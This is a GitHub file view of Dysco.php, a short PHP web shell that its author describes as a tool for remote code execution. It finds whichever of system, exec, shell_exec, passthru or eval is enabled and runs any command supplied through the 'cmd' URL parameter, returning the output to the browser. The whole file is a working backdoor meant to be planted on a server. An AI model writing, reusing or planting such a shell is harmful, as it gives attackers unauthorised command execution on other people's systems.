-
Notifications
You must be signed in to change notification settings - Fork 3
/
Dysco.php
59 lines (47 loc) · 1.34 KB
/
Dysco.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
<?php
/*
* Dysco(Dynamic PHP Shell Command for RCE)
* Created by Petruknisme @2020
* Contact: petruknisme@pm.me
*/
function Dysco($command)
{
$list_function_shell = array("system", "exec", "shell_exec", "passthru", "eval");
$f_enabled = array_filter($list_function_shell, 'function_exists');
echo "Enabled Function:\n<br/>";
foreach($f_enabled as $f)
{
echo $f." ";
}
if($f_enabled !== ""){
$f = $f_enabled[0];
echo "<br/>\nUsing ". $f. " as shell command\n<br/>";
if($f == "system" || $f == "passthru"){
// disable multiple output for system
ob_start();
$output = $f($command, $status);
ob_clean();
}
else if($f == "exec"){
$f($command, $output, $status);
$output = implode("n", $output);
}
else if($f == "shell_exec"){
$output = $f($command);
}
else{
$output = "Command execution not possible. All supported function is disabled.";
$status = 1;
}
}
return array('output' => $output , 'status' => $status);
}
// for HTTP GET use this.
if(isset($_GET['cmd'])){
$o = Dysco($_GET['cmd']);
echo $o['output'];
}
// for debugging in local, use this
//$o = shell_spawn('uname -a');
//echo $o['output'];
?>